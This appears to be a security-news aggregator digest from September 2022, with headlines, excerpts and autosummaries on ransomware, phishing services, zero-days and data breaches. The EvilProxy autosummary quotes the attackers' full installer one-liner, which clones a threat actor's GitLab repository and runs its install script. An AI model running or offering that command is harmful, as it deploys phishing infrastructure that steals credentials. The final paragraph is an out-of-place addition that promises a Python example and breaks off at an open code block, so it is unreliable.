                The post Ransomware attacks on Linux to surge appeared first on Help Net Security.

                Autosummary: According to the data: 63 billion threats blocked by Trend Micro in 1H 2022; 52% more threats in the first half of the year than the same period in 2021; government, manufacturing and healthcare are the top three sectors targeted with malware; detection of attacks from ransomware-as-a-service surged in the first half of 2022.


                SecureAuth Arculix offers passwordless desktop SSO and continuous authentication

                ransomware
                2022-09-05 https://www.helpnetsecurity.com/2022/09/05/arculix-secureauth/

                SecureAuth has released Arculix, an access management and continuous authentication platform. Driven by SecureAuth’s patented risk-based behavioral modeling engine, Arculix provides end users with a frictionless and passwordless digital journey. The platform takes into account an identity’s level of assurance based on user, device and browser trust that employs artificial intelligence and machine learning (AI/ML) to determine anomalous behavior. Arculix enables organizations to accelerate their Zero Trust initiatives by ensuring the right digital identities have … More

                The post SecureAuth Arculix offers passwordless desktop SSO and continuous authentication appeared first on Help Net Security.

                Autosummary: “Identity security remains a top concern and investment area for most enterprise and government organizations especially given that universal adoption of passwordless log-in technology is encouraged by leaders such as Apple, Google, Meta, Microsoft, Twitter, and more,” said Jay Bretzmann, Research Vice President for Security Products, IDC.


                Use of machine identities is growing in state-sponsored cyberattacks

                government ciber
                2022-09-05 https://www.helpnetsecurity.com/2022/09/05/state-sponsored-cyberattacks-video/

                66% of organizations have changed their cybersecurity strategy as a direct response to the conflict between Russia and Ukraine, while 64% suspect their organization has been either directly targeted or impacted by a nation-state cyber attack, according to Venafi. This Help Net Security video uncovers how exploiting machine identities is becoming the modus operandi for nation-state attackers.

                The post Use of machine identities is growing in state-sponsored cyberattacks appeared first on Help Net Security.



                Ransomware remains the number one threat to businesses and government organizations

                exploits government
                2022-09-05 https://www.helpnetsecurity.com/2022/09/05/ransomware-number-one-threat-video/

                Acronis researchers have concluded that ransomware continues to be the number one threat to large and medium-sized businesses, including government organizations. This Help Net Security video highlights why organizations and businesses need a more holistic approach to cybersecurity.

                The post Ransomware remains the number one threat to businesses and government organizations appeared first on Help Net Security.



                Fake Antivirus and Cleaner Apps Caught Installing SharkBot Android Banking Trojan

                financial exploits
                2022-09-05 https://thehackernews.com/2022/09/fake-antivirus-and-cleaner-apps-caught.html
                The notorious Android banking trojan known as SharkBot has once again made an appearance on the Google Play Store by masquerading as antivirus and cleaner apps. "This new dropper doesn't rely on Accessibility permissions to automatically perform the installation of the dropper Sharkbot malware," NCC Group's Fox-IT said in a report. "Instead, this new version asks the victim to install the



                Windows Defender identified Chromium, Electron apps as Hive Ransomware

                exploits ransomware
                2022-09-05 https://securityaffairs.co/wordpress/135326/security/windows-defender-flase-positive.html

                Microsoft released a Windows Defender update to fix a problem that caused the Defender antivirus software to identify apps based on the Chromium browser engine or the Electron JavaScript framework as malware. Multiple users reported […]

                The post Windows Defender identified Chromium, Electron apps as Hive Ransomware appeared first on Security Affairs.



                EvilProxy Phishing-As-A-Service With MFA Bypass Emerged In Dark Web

                financial
                2022-09-05 https://securityaffairs.co/wordpress/135318/cyber-crime/evilproxy-phishing-as-a-service.html

                Resecurity researchers discovered a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised on the Dark Web. Original post: hxxps://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web Following the recent Twilio hack leading to the leakage of 2FA (OTP) codes, cybercriminals continue to upgrade their attack arsenal to orchestrate advanced phishing campaigns targeting users worldwide. Resecurity has recently identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark […]

                The post EvilProxy Phishing-As-A-Service With MFA Bypass Emerged In Dark Web appeared first on Security Affairs.

                Autosummary: The automated installer has a reference to a user “Olf Dobs” (ksh8h297aydO) on Gitlab: apt update -qqy && apt dist-upgrade –no-install-recommends –no-install-suggests -o Dpkg::options::=”–force-confdef” -y \ && apt install –no-install-recommends –no-install-suggests -y git \ && rm -rf /srv/control-agent && git clone –recurse-submodules https://gitlab.com/ksh8h297ayd0/docker-control-agent.git /srv/control-agent \ && cd /srv/control-agent && chmod +x ./install.sh \ && /srv/control-agent/install.sh ‘[license_key]’ After a successful deployment, the scripts will forward the traffic from the victims via 2 gateways defined as “upstream”. Based on further analysis, we identified some of the domain names used for phishing campaigns. The bad actors are using multiple techniques and approaches to recognize victims and to protect the phishing-kit code from being detected.


                QNAP: New DeadBolt ransomware attacks exploit Photo Station bug

                exploits ransomware
                2022-09-05 https://www.bleepingcomputer.com/news/security/qnap-new-deadbolt-ransomware-attacks-exploit-photo-station-bug/
                QNAP is warning customers of ongoing DeadBolt ransomware attacks that started on Saturday by exploiting a zero-day vulnerability in Photo Station. [...]

                Autosummary: QTS 5.0.1: Photo Station 6.1.2 and later; QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later; QTS 4.3.6: Photo Station 5.7.18 and later; QTS 4.3.3: Photo Station 5.4.15 and later; QTS 4.2.6: Photo Station 5.2.14 and later. Alternatively, QNAP suggests users replace Photo Station with QuMagie, a safer photo storage management tool for QNAP NAS devices.


                Ransomware Attackers Abuse Genshin Impact Anti-Cheat System to Disable Antivirus

                exploits
                2022-09-05 https://thehackernews.com/2022/09/ransomware-attackers-abuse-genshin.html
                A vulnerable anti-cheat driver for the Genshin Impact video game has been leveraged by a cybercrime actor to disable antivirus programs to facilitate the deployment of ransomware, according to findings from Trend Micro. The ransomware infection, which was triggered in the last week of July 2022, banked on the fact that the driver in question ("mhyprot2.sys") is signed with a valid certificate,

                Autosummary: In the incident analyzed by Trend Micro, a compromised endpoint belonging to an unnamed entity was used as a conduit to connect to the domain controller via remote desktop protocol (RDP) and transfer to it a Windows installer posing as AVG Internet Security, which dropped and executed, among other files, the vulnerable driver.


                New EvilProxy service lets all hackers use advanced phishing tactics

                financial industry
                2022-09-05 https://www.bleepingcomputer.com/news/security/new-evilproxy-service-lets-all-hackers-use-advanced-phishing-tactics/
                A reverse-proxy Phishing-as-a-Service (PaaS) platform called EvilProxy has emerged, promising to steal authentication tokens to bypass multi-factor authentication (MFA) on Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and even PyPI. [...]



                QNAP patches zero-day used in new Deadbolt ransomware attacks

                exploits ransomware
                2022-09-05 https://www.bleepingcomputer.com/news/security/qnap-patches-zero-day-used-in-new-deadbolt-ransomware-attacks/
                QNAP is warning customers of ongoing DeadBolt ransomware attacks that started on Saturday by exploiting a zero-day vulnerability in Photo Station. [...]

                Autosummary: QTS 5.0.1: Photo Station 6.1.2 and later; QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later; QTS 4.3.6: Photo Station 5.7.18 and later; QTS 4.3.3: Photo Station 5.4.15 and later; QTS 4.2.6: Photo Station 5.2.14 and later. Alternatively, QNAP suggests users replace Photo Station with QuMagie, a safer photo storage management tool for QNAP NAS devices.


                TikTok denies data breach following leak of user data

                financial
                2022-09-05 https://securityaffairs.co/wordpress/135333/data-breach/tiktok-data-leak.html

                Threat actors published a sample of data allegedly stolen from TikTok, but the company denies it was breached. The hacking collective AgainstTheWest recently published a post on the Breach Forums message board claiming to have hacked TikTok and stolen source code and user data. The group published screenshots of the allegedly stolen data; it claims to […]

                The post TikTok denies data breach following leak of user data appeared first on Security Affairs.



                Zero-day puts a dent in Chrome's mojo

                exploits
                2022-09-05 https://www.malwarebytes.com/blog/news/2022/09/update-chrome-asap-a-new-zero-day-is-already-being-exploited

                Categories: Exploits and vulnerabilities

                Categories: News

                The Google Chrome Team recently issued a fix for the CVE-2022-3075 zero-day.

                The post Zero-day puts a dent in Chrome's mojo appeared first on Malwarebytes Labs.


                QNAP warns new Deadbolt ransomware attacks exploiting zero-day

                exploits ransomware
                2022-09-05 https://securityaffairs.co/wordpress/135347/malware/qnap-deadbolt-ransomware-new-attacks.html

                QNAP warns customers of ongoing DeadBolt ransomware attacks that are exploiting a zero-day vulnerability in Photo Station. QNAP warns customers of an ongoing wave of DeadBolt ransomware attacks in which threat actors are exploiting a zero-day vulnerability in Photo Station. The attacks started on Saturday; in the meantime, the Taiwanese vendor has addressed the vulnerability. “QNAP Systems, Inc. today […]

                The post QNAP warns new Deadbolt ransomware attacks exploiting zero-day appeared first on Security Affairs.



                TikTok Denies Data Breach Reportedly Exposing Over 2 Billion Users' Information

                financial
                2022-09-05 https://thehackernews.com/2022/09/tiktok-denies-data-breach-reportedly.html
                Popular short-form social video service TikTok denied reports that it was breached by a hacking group, after it claimed to have gained access to an insecure cloud server. "TikTok prioritizes the privacy and security of our users' data," the ByteDance-owned company told The Hacker News. "Our security team investigated these claims and found no evidence of a security breach." The denial follows

                Autosummary: "AgainstTheWest has had a long history of lying about breaches or other things (saying he's a state-sponsored hacking group... LOL) and this was just the tipping point," pompompurin, the actor who launched Breach Forums earlier this March, said.


                Alleged Iranian threat actors leak the code of their CodeRAT malware

                exploits
                2022-09-04 https://securityaffairs.co/wordpress/135255/malware/coderat-malware.html

                The author of the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub. The development team behind the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub after the SafeBreach Labs researchers recently analyzed a new targeted attack aimed at Farsi-speaking code developers. […]

                The post Alleged Iranian threat actors leak the code of their CodeRAT malware appeared first on Security Affairs.

                Autosummary: CodeRAT allows its operators to monitor the victim’s activity on social networks and on local machines by supporting 50 commands, including taking screenshots, copying clipboard, terminating processes, analyzing GPU usage, downloading/uploading/deleting files, monitoring running processes, and executing programs.


                SharkBot malware sneaks back on Google Play to steal your logins

                exploits
                2022-09-04 https://www.bleepingcomputer.com/news/security/sharkbot-malware-sneaks-back-on-google-play-to-steal-your-logins/
                A new and upgraded version of the SharkBot malware has returned to Google's Play Store, targeting banking logins of Android users through apps that have tens of thousands of installations. [...]

                Autosummary: Cookie-loving shark: The overlay, SMS intercept, remote control, and keylogging systems are still present in SharkBot 2.25, but a cookie logger has been added on top of them.


                A new phishing scam targets American Express cardholders

                financial
                2022-09-04 https://securityaffairs.co/wordpress/135292/hacking/phishing-scam-targets-american-express.html

                Cybersecurity firm Armorblox discovered a new phishing campaign aimed at American Express customers. Armorblox researchers uncovered a new phishing campaign that is targeting American Express customers. The messages use a malicious attachment, and their content attempts to trick cardholders into opening it. The subject of the emails reads “Important Notification About Your Account” in an attempt to urge recipients […]

                The post A new phishing scam targets American Express cardholders appeared first on Security Affairs.



                Samsung Admits Data Breach that Exposed Details of Some U.S. Customers

                financial
                2022-09-03 https://thehackernews.com/2022/09/samsung-admits-data-breach-that-exposed.html
                South Korean chaebol Samsung on Friday said it experienced a cybersecurity incident that resulted in the unauthorized access of some customer information, the second time this year it has reported such a breach. "In late July 2022, an unauthorized third-party acquired information from some of Samsung's U.S. systems," the company disclosed in a notice. "On or around August 4, 2022, we determined


                Google Release Urgent Chrome Update to Patch New Zero-Day Vulnerability

                exploits
                2022-09-03 https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html
                Google on Friday shipped emergency fixes to address a security vulnerability in the Chrome web browser that it said is being actively exploited in the wild. The issue, assigned the identifier CVE-2022-3075, concerns a case of insufficient data validation in Mojo, which refers to a collection of runtime libraries that provide a platform-agnostic mechanism for inter-process communication (IPC). An


                Google rolled out emergency fixes to address actively exploited Chrome zero-day

                exploits
                2022-09-03 https://securityaffairs.co/wordpress/135249/security/chrome-emergency-patches.html

                Google rolled out emergency fixes to address a vulnerability in the Chrome web browser that is being actively exploited in the wild. Google on Friday released emergency fixes to address a vulnerability, tracked as CVE-2022-3075, in the Chrome web browser that is being actively exploited in the wild. The CVE-2022-3075 flaw is caused by insufficient data […]

                The post Google rolled out emergency fixes to address actively exploited Chrome zero-day appeared first on Security Affairs.



                Malware dev open-sources CodeRAT after being exposed

                exploits
                2022-09-03 https://www.bleepingcomputer.com/news/security/malware-dev-open-sources-coderat-after-being-exposed/
                The source code of a remote access trojan (RAT) dubbed "CodeRAT" has been leaked on GitHub after malware analysts confronted the developer about attacks that used the tool. [...]


                CIOs find it most difficult to solve cybersecurity challenges

                ciber
                2022-09-02 https://www.helpnetsecurity.com/2022/09/02/cio-solve-cybersecurity-challenges/

                A global research study from Lenovo reveals how the CIO role has evolved, shedding light on growing areas of responsibility and increasing influence in the C-Suite, as well as removing barriers to business growth. Today, technology is the nervous system that connects corporate strategy, finance, innovation, operations, and talent. CIOs are increasingly tasked with connecting with key stakeholders across the organization to ensure alignment and drive execution. With IT enmeshed in every facet of a … More

                The post CIOs find it most difficult to solve cybersecurity challenges appeared first on Help Net Security.

                Autosummary: 9-in-10 CIOs say that their role and responsibilities have expanded beyond technology, including non-traditional areas such as data analytics and business reporting (56%), sustainability/ESG (45%), DE&I (42%), HR/talent acquisition (39%), and sales/marketing (32%). Similarly, in the UK, 9-in-10 CIOs say that their role and responsibilities have expanded beyond technology, including non-traditional areas such as digital transformation and business process automation (62%), data analytics and business reporting (57%), DE&I (42%), and HR/talent acquisition (58%).


                Google Chrome Bug Lets Sites Silently Overwrite System Clipboard Content

                exploits
                2022-09-02 https://thehackernews.com/2022/09/google-chrome-bug-lets-sites-silently.html
                A "major" security issue in the Google Chrome web browser, as well as Chromium-based alternatives, could allow malicious web pages to automatically overwrite clipboard content without requiring any user consent or interaction by simply visiting them. The clipboard poisoning attack is said to have been accidentally introduced in Chrome version 104, according to developer Jeff Johnson. While the


                New Evidence Links Raspberry Robin Malware to Dridex and Russian Evil Corp Hackers

                exploits
                2022-09-02 https://thehackernews.com/2022/09/new-evidence-links-raspberry-robin.html
                Researchers have identified functional similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operators' connections to the Russia-based Evil Corp group. The findings suggest that "Evil Corp is likely using Raspberry Robin infrastructure to carry out its attacks," IBM Security X-Force researcher Kevin Henson


                San Francisco 49ers: Blackbyte ransomware gang stole info of 20K people

                exploits ransomware
                2022-09-02 https://www.bleepingcomputer.com/news/security/san-francisco-49ers-blackbyte-ransomware-gang-stole-info-of-20k-people/
                NFL's San Francisco 49ers are mailing notification letters confirming a data breach affecting more than 20,000 individuals following a ransomware attack that hit its network earlier this year. [...]


                JuiceLedger Hackers Behind the Recent Phishing Attacks Against PyPI Users

                financial
                2022-09-02 https://thehackernews.com/2022/09/juiceledger-hackers-behind-recent.html
                More details have emerged about the operators behind the first-known phishing campaign specifically aimed at the Python Package Index (PyPI), the official third-party software repository for the programming language. Connecting it to a threat actor tracked as JuiceLedger, cybersecurity firm SentinelOne, along with Checkmarx, described the group as a relatively new entity that surfaced in early


                Another Ransomware For Linux Likely In Development

                exploits ransomware
                2022-09-02 https://securityaffairs.co/wordpress/135218/malware/linux-ransomware-under-development.html

                Uptycs researchers recently spotted a new Linux ransomware that appears to be under active development. The Uptycs Threat Research team recently observed an Executable and Linkable Format (ELF) ransomware which encrypts the files inside Linux systems based on the given folder path. We observed that the dropped README note matches exactly with the DarkAngels ransomware […]

                The post Another Ransomware For Linux Likely In Development appeared first on Security Affairs.

                Autosummary: Figure 3: pthread usage inside the ransomware binary. The start_routine() function (FUN_0041cf55, see Figure 4) performs the following steps to encrypt target files: it opens the target file and sets a write lock on it using fcntl().


                Experts link Raspberry Robin Malware to Evil Corp cybercrime gang

                exploits
                2022-09-02 https://securityaffairs.co/wordpress/135206/cyber-crime/raspberry-robin-linked-to-evil-corp.html

                Researchers attribute the Raspberry Robin malware to the Russian cybercrime group known as Evil Corp group. IBM Security X-Force researchers discovered similarities between a component used in the Raspberry Robin malware and a Dridex malware loader, which was part of the malicious operations of the cybercrime gang Evil Corp. Raspberry Robin is a Windows worm discovered […]

                The post Experts link Raspberry Robin Malware to Evil Corp cybercrime gang appeared first on Security Affairs.

                Autosummary: In many cases, the infection process led to the deployment of custom Cobalt Strike loaders attributed to DEV-0243, which falls under activity tracked by the experts as “EvilCorp.” Now IBM Security X-Force researchers have announced that they found evidence that Evil Corp is likely using Raspberry Robin infrastructure to carry out its attacks.


                Dev backdoors own malware to steal data from other hackers

                exploits
                2022-09-02 https://www.bleepingcomputer.com/news/security/dev-backdoors-own-malware-to-steal-data-from-other-hackers/
                Cybercriminals using Prynt Stealer to collect data from victims are being swindled by the malware developer, who also receives a copy of the info over the Telegram messaging service. [...]

                Autosummary: Figure: DarkEye Telegram token and ID, and active keylogger code (Zscaler). In addition, the malware author configures the builder to drop and execute LodaRAT, an old (2017) yet powerful trojan that enables remote actors to take control of the infected system, steal information, fetch additional payloads, etc.


                Samsung discloses data breach after July hack

                financial
                2022-09-02 https://www.bleepingcomputer.com/news/security/samsung-discloses-data-breach-after-july-hack/
                Electronics giant Samsung has confirmed a new data breach today after some of its U.S. systems were hacked to steal customer data. [...]


                Hive ransomware hits Damart clothing store with $2 million ransom

                exploits ransomware
                2022-09-02 https://www.bleepingcomputer.com/news/security/hive-ransomware-hits-damart-clothing-store-with-2-million-ransom/
                Damart, a French clothing company with over 130 stores across the world, is being extorted for $2 million after a cyberattack from the Hive ransomware gang. [...]

                Autosummary: Damart homepage as seen on August 15, 2022. At that time, following a request for comment from BleepingComputer, Damart stated the following: "Damart, the mail order clothing brand, based in Bingley, West Yorkshire, has confirmed that there was an attempt to intrude into their IT systems, which they were rapidly able to intercept with strong security protocols."


                Prynt Stealer Contains a Backdoor to Steal Victims' Data Stolen by Other Cybercriminals

                ciber
                2022-09-02 https://thehackernews.com/2022/09/prynt-stealer-contains-backdoor-to.html
                Researchers discovered a private Telegram channel-based backdoor in the information stealing malware, dubbed Prynt Stealer, which its developer added with the intention of secretly stealing a copy of victims' exfiltrated data when used by other cybercriminals. "While this untrustworthy behavior is nothing new in the world of cybercrime, the victims' data end up in the hands of multiple threat


                The Prynt Stealer malware contains a secret backdoor. Crooks steal data from other cybercriminals

                exploits ciber
                2022-09-02 https://securityaffairs.co/wordpress/135229/malware/prynt-stealer-backdoor.html

                The information-stealing malware Prynt Stealer contains a backdoor that allows stealing the data it has exfiltrated from victims. Zscaler researchers discovered a Telegram channel-based backdoor in the information-stealing malware Prynt Stealer that allows a copy of the data exfiltrated from the victims to be secretly stolen. “Zscaler ThreatLabz researchers have uncovered the Prynt Stealer builder, also […]

                The post The Prynt Stealer malware contains a secret backdoor. Crooks steal data from other cybercriminals appeared first on Security Affairs.

                Autosummary: “Zscaler ThreatLabz researchers have uncovered the Prynt Stealer builder, also attributed with WorldWind, and DarkEye, has a secret backdoor in the code that ends up in every derivative copy and variant of these malware families.” reads the analysis published by Zscaler.


                Google Chrome emergency update fixes new zero-day used in attacks

                exploits
                2022-09-02 https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-new-zero-day-used-in-attacks/
                Google has released Chrome 105.0.5195.102 for Windows, Mac, and Linux users to address a single high-severity security flaw, the sixth Chrome zero-day exploited in attacks patched this year. [...]

                Autosummary: August 17th; CVE-2022-2294 - July 4th; CVE-2022-1364 - April 14th; CVE-2022-1096 - March 25th


                BlackCat ransomware claims attack on Italian energy agency

                exploits ransomware industry
                2022-09-02 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-attack-on-italian-energy-agency/
                The BlackCat/ALPHV ransomware gang claimed responsibility for an attack that hit the systems of Italy's energy agency Gestore dei Servizi Energetici SpA (GSE) over the weekend. [...]

                Autosummary: The attackers say that the stolen files contain confidential data, including contracts, reports, project information, accounting documents, and other internal documentation.


                Damart clothing store hit by Hive ransomware, $2 million demanded

                exploits ransomware
                2022-09-02 https://www.bleepingcomputer.com/news/security/damart-clothing-store-hit-by-hive-ransomware-2-million-demanded/
                Damart, a French clothing company with over 130 stores across the world, is being extorted for $2 million after a cyberattack from the Hive ransomware gang. [...]

                Autosummary: Damart homepage as seen on August 15, 2022. At that time, following a request for comment from BleepingComputer, Damart stated the following: "Damart, the mail order clothing brand, based in Bingley, West Yorkshire, has confirmed that there was an attempt to intrude into their IT systems, which they were rapidly able to intercept with strong security protocols."


                Samsung discloses a second data breach this year

                financial
                2022-09-02 https://securityaffairs.co/wordpress/135241/data-breach/samsung-second-data-breach-2022.html

Electronics giant Samsung has confirmed a new data breach after some of its US systems were compromised in July. After the attack that hit the company in late July 2022, Samsung disclosed a data breach. The electronics giant discovered on August 4 that threat actors had accessed its systems and exfiltrated customer personal […]

                The post Samsung discloses a second data breach this year appeared first on Security Affairs.

                "

Autosummary: The company states that customers need take no immediate action to mitigate the potential impact of the incident, but it recommends that they remain cautious of any unsolicited communications that ask for personal information or refer them to a web page asking for personal information; avoid clicking on links or downloading attachments from suspicious emails; and review their accounts for suspicious activity. In March 2022, Samsung disclosed another data breach after it was hit by an attack conducted by the data extortion group Lapsus$. Threat actors had access to internal company data, including the source code of Galaxy models. "


                Dealing with cyber threats in the energy sector: Are we on the right path?

                industry
                2022-09-01 https://www.helpnetsecurity.com/2022/09/01/cyber-threats-energy-sector/

In this interview for Help Net Security, Katie Taitler, Senior Cybersecurity Strategist at Axonius, talks about cyber threats in the energy sector and what should be improved to make sure this sector is properly guarded. We have witnessed numerous cyberattacks on the energy sector in the past few years. What could be the consequences of such attacks? Attacks on the energy sector are often a show of power that are meant to cause large-scale disruption. … More

                The post Dealing with cyber threats in the energy sector: Are we on the right path? appeared first on Help Net Security.

                "

Autosummary: It always starts with the fundamentals and knowing your baselines: what technology do you have, where is it, what state is it in, how can it be attacked, what vulnerabilities might criminals take advantage of, can they be patched, what are the priorities? Energy organizations need to devote time and energy, and collaborate better with the private sector, to seek out research, best practices, and establish improved information sharing among organizations. "


                7 metrics to measure the effectiveness of your security operations

                industry
                2022-09-01 https://www.helpnetsecurity.com/2022/09/01/7-metrics-measure-effectiveness-security-operations-video/

                Given inflation and economic uncertainty, the cybersecurity industry is starting to experience budget cuts, despite a surge in ransomware attacks. As more budgets are going under the microscope, and in some cases, on the chopping block, one of the best ways for security leaders to protect their program is to ensure alignment with their executive teams and boards. In this Help Net Security video, Andrew Hollister, CSO at LogRhythm, talks about measuring the effectiveness of … More

                The post 7 metrics to measure the effectiveness of your security operations appeared first on Help Net Security.

                "

                Autosummary: "


                How Just-in-Time privilege elevation prevents data breaches and lateral movement

                financial
                2022-09-01 https://www.helpnetsecurity.com/2022/09/01/how-just-in-time-privilege-elevation-prevents-data-breaches-and-lateral-movement/

                Are inadequate security policies for privileged access making you highly vulnerable to security breaches and ransomware attacks? In the weeks that followed the high-profile attack on the SolarWinds supply chain, it became clear that the threat actors infiltrated the company’s internal networks and cloud infrastructure through unrestricted privileged access. Once inside the network, they were able to move laterally in the system. This attack and many others reinforce the importance of an effective Privileged Access … More

                The post How Just-in-Time privilege elevation prevents data breaches and lateral movement appeared first on Help Net Security.

                "

Autosummary: According to the Gartner report "Reduce Risk Through a Just-in-Time Approach to Privileged Access Management", “By the year 2025, 75% of cyber insurance providers will mandate the use of JIT PAM principles.” We must eliminate broad and discretionary access, remove accounts with standing privileges, enforce least privilege, and enable JIT access request workflows for legitimate time-bound access. Since JIT privilege elevation eliminates standing privileges, many IT tasks are also eliminated, such as credential rotation, privileged access expiration, and account deletion. "


                Apple Releases iOS Update for Older iPhones to Fix Actively Exploited Vulnerability

                exploits
                2022-09-01 https://thehackernews.com/2022/09/apple-releases-ios-update-for-older.html
                Apple on Wednesday backported security updates to older iPhones, iPads, and iPod touch devices to address a critical security flaw that has been actively exploited in the wild. The issue, tracked as CVE-2022-32893 (CVSS score: 8.8), is an out-of-bounds write issue affecting WebKit that could lead to arbitrary code execution when processing maliciously crafted web content. The tech "

                Autosummary: "


Microsoft Discovers Severe ‘One-Click’ Exploit for TikTok Android App

                exploits
                2022-09-01 https://thehackernews.com/2022/09/microsoft-discover-severe-one-click.html
Microsoft on Wednesday disclosed details of a now-patched "high severity vulnerability" in the TikTok app for Android that could let attackers take over accounts when victims clicked on a malicious link. "Attackers could have leveraged the vulnerability to hijack an account without users' awareness if a targeted user simply clicked a specially crafted link," Dimitrios Valsamaras of the Microsoft "

                Autosummary: "The filtering takes place on the server-side and the decision to load or reject a URL is based on the reply received from a particular HTTP GET request," Valsamaras explained, adding the static analysis "indicated that it is possible to bypass the server-side check by adding two additional parameters to the deeplink. "


                FBI is helping Montenegro in investigating the ongoing cyberattack

                ciber
                2022-09-01 https://securityaffairs.co/wordpress/135143/cyber-warfare-2/fbi-helps-montenegro-investigation.html

                A team of cybersecurity experts from the US FBI will help the authorities in Montenegro to investigate the recent massive cyberattack. A team of cybersecurity experts from the FBI is heading to Montenegro to help local authorities in investigating the recent massive cyber attack that hit the government infrastructure last week. “This is another confirmation […]

                The post FBI is helping Montenegro in investigating the ongoing cyberattack appeared first on Security Affairs.

                "

Autosummary: The term “Hybrid warfare” refers to a military strategy which employs political warfare and blends conventional warfare, irregular warfare and cyberwarfare with other influencing methods, such as fake news, diplomacy, lawfare and foreign electoral intervention. "


                Apple released patches for recently disclosed WebKit zero-day in older iPhones and iPads

                exploits
                2022-09-01 https://securityaffairs.co/wordpress/135136/security/apple-security-flaws-iphone.html

Apple released new security updates for older iPhone and iPad devices addressing a recently fixed WebKit zero-day. Apple has released new updates to backport patches released this month to older iPhone and iPad devices addressing the CVE-2022-32893 flaw. The CVE-2022-32893 flaw is an out-of-bounds write issue that impacts WebKit. An attacker can trigger the flaw by tricking target devices into processing maliciously crafted web […]

                The post Apple released patches for recently disclosed WebKit zero-day in older iPhones and iPads appeared first on Security Affairs.

                "

                Autosummary: "


                Thousands lured with blue badges in Instagram phishing attack

                financial
                2022-09-01 https://www.bleepingcomputer.com/news/security/thousands-lured-with-blue-badges-in-instagram-phishing-attack/
                A new Instagram phishing campaign is underway, attempting to scam users of the popular social media platform by luring them with a blue-badge offer. [...] "

                Autosummary: The second step in the phishing process (Vade) The first form requests “username”, the second asks the victim to enter “name”, “email”, and “phone number”, while the third and final step requests entering the user “password”, to supposedly verify that they own the account. "


                Researchers Detail Emerging Cross-Platform BianLian Ransomware Attacks

                exploits ransomware
                2022-09-01 https://thehackernews.com/2022/09/researchers-detail-emerging-cross.html
The operators of the emerging cross-platform BianLian ransomware have increased their command-and-control (C2) infrastructure this month, a development that alludes to an increase in the group's operational tempo. BianLian, written in the Go programming language, was first discovered in mid-July 2022 and has claimed 15 victim organizations as of September 1, cybersecurity firm [redacted] said in "

                Autosummary: According to Cyble, which detailed the modus operandi of the ransomware earlier this month, targeted companies span several industry sectors such as media, banking, energy, manufacturing, education, healthcare, and professional services. "


                Ragnar Locker ransomware gang claims to have stolen data from TAP Air Portugal

                exploits ransomware
                2022-09-01 https://securityaffairs.co/wordpress/135168/data-breach/ragnar-locker-ransomware-tap-air-portugal.html

The Ragnar Locker ransomware gang claims to have hacked the Portuguese state-owned flag carrier airline TAP Air Portugal and stolen customers’ data. The Ragnar Locker ransomware gang added the Portuguese state-owned flag carrier airline TAP Air Portugal to its leak site and claims to have stolen customers’ data. On August 26, the Portuguese company announced via […]

                The post Ragnar Locker ransomware gang claims to have stolen data from TAP Air Portugal appeared first on Security Affairs.

                "

                Autosummary: The ransomware group published screenshots of the stolen data, which allegedly includes names, addresses, email addresses, phone numbers, corporate IDs, travel information, nationality, gender, and other personal information. "


                New ransomware hits Windows, Linux servers of Chile govt agency

                exploits latam ransomware
                2022-09-01 https://www.bleepingcomputer.com/news/security/new-ransomware-hits-windows-linux-servers-of-chile-govt-agency/
Chile's national computer security and incident response team (CSIRT) has announced that a ransomware attack has impacted operations and online services of a government agency in the country. [...] "

Autosummary: "The ransomware would use the NTRUEncrypt public key encryption algorithm, targeting log files (.log), executable files (.exe), dynamic library files (.dll), swap files (.vswp), virtual disks (.vmdk), snapshot (.vmsn) files, and virtual machine memory (.vmem) files, among others," - Chile CSIRT. According to CSIRT, the malware used in this attack also had functions for stealing credentials from web browsers, listing removable devices for encryption, and evading antivirus detection using execution timeouts. "


                Montenegro hit by ransomware attack, hackers demand $10 million

                exploits ransomware
                2022-09-01 https://www.bleepingcomputer.com/news/security/montenegro-hit-by-ransomware-attack-hackers-demand-10-million/
                The government of Montenegro has admitted that its previous allegations about Russian threat actors attacking critical infrastructure in the country were false and now blames ransomware for the damage to its IT infrastructure that has caused extensive service disruptions. [...] "

                Autosummary: "


                Apple releases security update for iPhones and iPads to address vulnerability

                exploits
                2022-09-01 https://www.malwarebytes.com/blog/news/2022/09/apple-releases-security-update-for-iphones-and-ipads-to-address-vulnerability

                Categories: News

                Tags: Apple

                Tags: iOS 12.5.6

                Tags: webkit

                Tags: CVE-2022-32893

                Apple has released a security update for iOS 12.5.6 to patch a remotely exploitable WebKit vulnerability that allows attackers to execute arbitrary code on unpatched devices.


                The post Apple releases security update for iPhones and iPads to address vulnerability appeared first on Malwarebytes Labs.

                "

                Autosummary: Owners of an iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, or iPod touch (6th generation) can use the update function on the device or use iTunes to update the software to iOS 12.5.6. "


                TikTok vulnerability could have allowed hijackers to take over accounts

                exploits
                2022-09-01 https://www.malwarebytes.com/blog/news/2022/09/tiktok-vulnerability-could-have-allowed-hijackers-to-take-over-accounts

                Categories: News

                Tags: Exploit

                Tags: vulnerability

                Tags: Tik-Tok

                Tags: Microsoft

                Tags: JavaScript

                We take a look at a TikTok exploit discovered by Microsoft and passed on to the social media giant to have fixed.


                The post TikTok vulnerability could have allowed hijackers to take over accounts appeared first on Malwarebytes Labs.

                "

Autosummary: The perils of JavaScript interface injection: exploitation was dependent on how the app implemented JavaScript interfaces, provided by the Android WebView component, which is used to load and display web pages. Fixes and suggestions: Microsoft has the following advice for app developers who need to work with JavaScript interfaces: use the default browser to open URLs that don’t belong to the application’s approved list. "
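Microsoft's advice above is to hand any URL outside the app's approved list to the system browser rather than to the app's own WebView, where a JavaScript interface could be reached. The page does not give the two parameters that bypassed TikTok's server-side check, so the following Python (an added example, not TikTok's or Microsoft's code) shows the class of mistake and its fix generically: a substring check on the URL beside a check that parses the URL and compares only the hostname against the allowlist. The allowlisted host example.app and the probe URLs are hypothetical and constructed for this example.

```python
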